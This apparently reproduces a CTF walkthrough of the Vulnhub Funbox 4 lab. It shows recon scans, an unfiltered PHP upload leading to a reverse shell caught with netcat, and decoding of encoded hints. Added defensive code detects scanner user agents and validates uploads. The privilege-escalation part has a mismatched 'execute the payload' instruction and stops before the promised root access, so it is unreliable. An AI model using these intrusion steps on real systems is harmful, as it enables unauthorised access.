Vulnhub之Funbox 4靶机详细测试过程(提权成功)


Funbox 4

Target information

Name: Funbox: CTF
URL: https://www.vulnhub.com/entry/funbox-ctf,546/
Identifying the target IP address

Import the target into VirtualBox, set its network adapter to host-only mode, and start Kali Linux and the target.
The built-in netdiscover tool identifies the target's IP address as 192.168.56.150.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
192.168.56.100  08:00:27:4e:f4:34      1      60  PCS Systemtechnik GmbH
192.168.56.150  08:00:27:4e:a2:f4      1      60  PCS Systemtechnik GmbH
```
Nmap scan

Run a full-port scan with nmap:
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
|   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1
MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.70 seconds
```
The nmap results show four open ports on the target: 22 (ssh), 80 (http), 110 (pop3) and 143 (imap).
Getting a shell
```
└─$ nikto -h http://192.168.56.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.150
+ Target Hostname:    192.168.56.150
+ Target Port:        80
+ Start Time:         2023-05-06 02:46:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-05-06 02:47:07 (GMT-4) (56 seconds)
---------------------------------------------------------------------------
```
The author actually gives a hint: this box is case-sensitive, which the nikto scan does not account for. Although /robots.txt does not exist, we can check whether an upper-case ROBOTS.TXT exists.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/ROBOTS.TXT
Disallow: upload/
Disallow: igmseklhgmrjmtherij2145236
```
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /igmseklhgmrjmtherij2145236/
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80</address>
</body></html>
```
Visiting igmseklhgmrjmtherij2145236 returns Forbidden, so the directory probably contains subdirectories or files; we continue with a gobuster scan.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.150/igmseklhgmrjmtherij2145236/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,bak,js,txt,sh
[+] Timeout:                 10s
===============================================================
2023/05/06 03:04:36 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 321]
/.php                 (Status: 403) [Size: 320]
/upload.html          (Status: 200) [Size: 297]
/upload               (Status: 301) [Size: 344] [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]
/upload.php           (Status: 200) [Size: 319]
Progress: 11663 / 1543927 (0.76%)^C
[!] Keyboard interrupt detected, terminating.
```
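From the defender's side, the nikto and gobuster runs above leave a very recognisable trail in the Apache access log: scanner user agents (gobuster announces itself as gobuster/3.5, as its banner shows), a burst of 404s from one client, and finally a GET of a .php file under an upload directory. The following is an added example of detection logic run over constructed log lines; it is not part of the original walkthrough, and the sample lines, the rule names and the `detect` function are my own assumptions rather than any tool's output.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Apache "combined" format. The IPs, paths and tool names
# mirror this walkthrough, but the lines themselves are made up for the example.
SAMPLE_LOG = """\
192.168.56.230 - - [06/May/2023:02:46:11 -0400] "GET / HTTP/1.1" 200 11321 "-" "Mozilla/5.00 (Nikto/2.1.6)"
192.168.56.230 - - [06/May/2023:02:46:12 -0400] "GET /robots.txt HTTP/1.1" 404 274 "-" "Mozilla/5.00 (Nikto/2.1.6)"
192.168.56.230 - - [06/May/2023:03:04:36 -0400] "GET /igmseklhgmrjmtherij2145236/aaaa.php HTTP/1.1" 404 274 "-" "gobuster/3.5"
192.168.56.230 - - [06/May/2023:03:04:36 -0400] "GET /igmseklhgmrjmtherij2145236/bbbb.html HTTP/1.1" 404 274 "-" "gobuster/3.5"
192.168.56.230 - - [06/May/2023:03:04:37 -0400] "GET /igmseklhgmrjmtherij2145236/cccc.txt HTTP/1.1" 404 274 "-" "gobuster/3.5"
192.168.56.230 - - [06/May/2023:03:04:37 -0400] "GET /igmseklhgmrjmtherij2145236/upload.php HTTP/1.1" 200 319 "-" "gobuster/3.5"
192.168.56.230 - - [06/May/2023:03:08:10 -0400] "POST /igmseklhgmrjmtherij2145236/upload.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
192.168.56.230 - - [06/May/2023:03:08:15 -0400] "GET /igmseklhgmrjmtherij2145236/upload/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.1 - - [06/May/2023:03:09:00 -0400] "GET /index.html HTTP/1.1" 200 11321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Only the two scanners that appear in this walkthrough.
SCANNER_UA = re.compile(r"(nikto|gobuster)", re.IGNORECASE)
# A server-side script being fetched from a directory meant for user uploads.
UPLOADED_SCRIPT = re.compile(r"/upload/[^/]+\.(php|phtml|phar)$", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text, burst_threshold=3, window=timedelta(seconds=60)):
    """Return a list of (ip, rule, detail) findings for the three behaviours above."""
    findings = []
    seen_scanners = set()
    not_found = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = SCANNER_UA.search(rec["ua"])
        if m and (rec["ip"], m.group(1).lower()) not in seen_scanners:
            seen_scanners.add((rec["ip"], m.group(1).lower()))
            findings.append((rec["ip"], "scanner-ua", rec["ua"]))
        if rec["status"] == 404:
            not_found[rec["ip"]].append(rec["ts"])
        if rec["method"] == "GET" and rec["status"] == 200 and UPLOADED_SCRIPT.search(rec["path"]):
            findings.append((rec["ip"], "script-in-upload-dir", rec["path"]))
    # Sliding window over each client's 404 timestamps: enumeration shows up as
    # many misses in a short interval, which a normal visitor never produces.
    for ip, stamps in not_found.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= burst_threshold:
                findings.append((ip, "404-burst", f"{end - start + 1} misses within {window.seconds}s"))
                break
    return findings


if __name__ == "__main__":
    for ip, rule, detail in detect(SAMPLE_LOG):
        print(f"{ip}  {rule:22s}  {detail}")
```

The 404 burst is the rule worth tuning: on a real site set the threshold from a baseline of ordinary miss rates, and note that the successful GET of shell.php is the only line of the eight that looks like a normal request, which is why the upload-directory rule keys on the path and status rather than on the user agent.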
Under that directory we find the /upload subdirectory and the upload.php file. The latter lets us upload files and applies no filtering at all, so the next step is to upload a shell.php file. Where does the uploaded file end up? Given the /upload subdirectory, it is probably stored there, and visiting the path confirms it:
```
http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php
```
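The root cause here is an upload handler with no validation that stores files under the client's chosen name inside the web root, where Apache will execute a .php file. The following is an added example of the checks such a handler should perform, written as a standalone Python function; it is not code from the target or from this walkthrough, and the `check_upload` name, the allow-list and the size limit are assumptions for the illustration.

```python
import os
import secrets

# Allow-list: canonical extension -> magic-byte prefixes a genuine file of that type starts with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
ALIASES = {"jpeg": "jpg"}
# Markers that should never appear in a file that claims to be an image or PDF.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")
MAX_BYTES = 5 * 1024 * 1024  # assumed limit for the example


def check_upload(filename, content):
    """Return (True, stored_name) if the upload is acceptable, else (False, reason)."""
    # 1. Drop any directory component the client sent (path traversal) and refuse
    #    dot-files such as .htaccess, which could change how the directory is served.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name or name.startswith("."):
        return False, "bad filename"
    if len(content) > MAX_BYTES:
        return False, "too large"
    # 2. Every suffix after the first dot must be on the allow-list, so shell.php.jpg
    #    is rejected rather than being judged by its last extension alone.
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = [ALIASES.get(p, p) for p in parts[1:]]
    if any(e not in MAGIC for e in exts):
        return False, f"extension not allowed: {'.'.join(parts[1:])}"
    ext = exts[-1]
    # 3. The bytes must really be the declared type; the extension alone proves nothing.
    if not content.startswith(MAGIC[ext]):
        return False, f"content is not a {ext} file"
    # 4. A genuine image can still carry a script in its trailer or metadata.
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded script marker"
    # 5. Never store under the client-chosen name: random name plus canonical extension.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    print(check_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32))
    print(check_upload("shell.php", b"<?php echo 'x'; ?>"))
    print(check_upload("shell.php.jpg", b"\xff\xd8\xff"))
```

Two server-side controls belong alongside this: keep the upload directory outside the document root (or serve it with script execution disabled, e.g. `php_admin_flag engine off` in the matching Apache `<Directory>` block when mod_php is in use), and serve downloads with a fixed `Content-Type` and `Content-Disposition: attachment`, so that even a file that slips past the checks is never executed or rendered.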
On Kali Linux we receive the reverse shell from the target.
```
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.150] 48272
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:08:17 up 26 min,  0 users,  load average: 1.13, 1.81, 2.70
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Aug 29  2020 .
drwxr-xr-x 23 root   root   4.0K May  6 09:07 ..
drwx------  4 anna   anna   4.0K Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4.0K Aug 30  2020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 30  2020 .
drwxr-xr-x 4 root   root   4.0K Aug 29  2020 ..
-rw------- 1 thomas thomas   46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas  220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 29  2020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas  675 Aug 29  2020 .profile
drwx------ 2 thomas thomas 4.0K Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas  195 Aug 29  2020 .todo
-rw------- 1 thomas thomas 1.3K Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas  217 Aug 30  2020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 22  2019 pspy64
```
Privilege Escalation
```
www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here.
I doesnt look forward to see this in the writeups/walktroughs,
but this is murpys law !
Now, rockyou.txt isnt your friend. Its a little sed harder :-)
If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
Bit more ?
Tm8gaGludHMgaGVyZSAhCg==
Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====
```
Execute the payload in the target host's shell, then use the suggester module to locate a suitable privilege-escalation module.
```
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
```
```
https://www.splitbrain.org/services/ook
```
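The hint file stacks three encodings: a Brainfuck program, a Base64 string and a Base32 string. The walkthrough decodes the Brainfuck part with the splitbrain ook web service; the following is an added, offline equivalent written for this page (not the author's code and not the service's), consisting of a minimal Brainfuck interpreter plus the standard-library Base64/Base32 decoders, run over the three strings exactly as quoted in hint.txt above. The `run_brainfuck` and `decode_hints` names are mine.

```python
import base64

# The three encoded strings from hint.txt, copied from the walkthrough above.
BF_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>"
    "+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++."
    "<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++."
    "---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++."
)
B64_HINT = "Tm8gaGludHMgaGVyZSAhCg=="
B32_HINT = "KNSWC4TDNAQGM33SEB2G6ZDPOMXA===="


def run_brainfuck(program, max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 30000 8-bit wrapping cells, no input (',' is a no-op).

    Brackets are matched up front so that jumps are O(1), and a step limit guards
    against a non-terminating program when decoding an untrusted hint.
    """
    jump, stack = {}, []
    for i, c in enumerate(program):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ] at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched [ at offset {stack[-1]}")

    tape = bytearray(30000)
    ptr = pc = steps = 0
    out = []
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = program[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer out of range")
        pc += 1
    return "".join(out)


def decode_hints():
    """Decode all three layers of the hint and return them keyed by encoding."""
    return {
        "brainfuck": run_brainfuck(BF_PROGRAM),
        "base64": base64.b64decode(B64_HINT).decode(),
        "base32": base64.b32decode(B32_HINT).decode(),
    }


if __name__ == "__main__":
    for kind, text in decode_hints().items():
        print(f"{kind:10s} -> {text!r}")
```

The Base32 layer is the one that actually points somewhere: it names a file type that is present in thomas's home directory listing above (`.todo`), which is the kind of cross-check worth doing before spending time on the password-cracking hints in the same file.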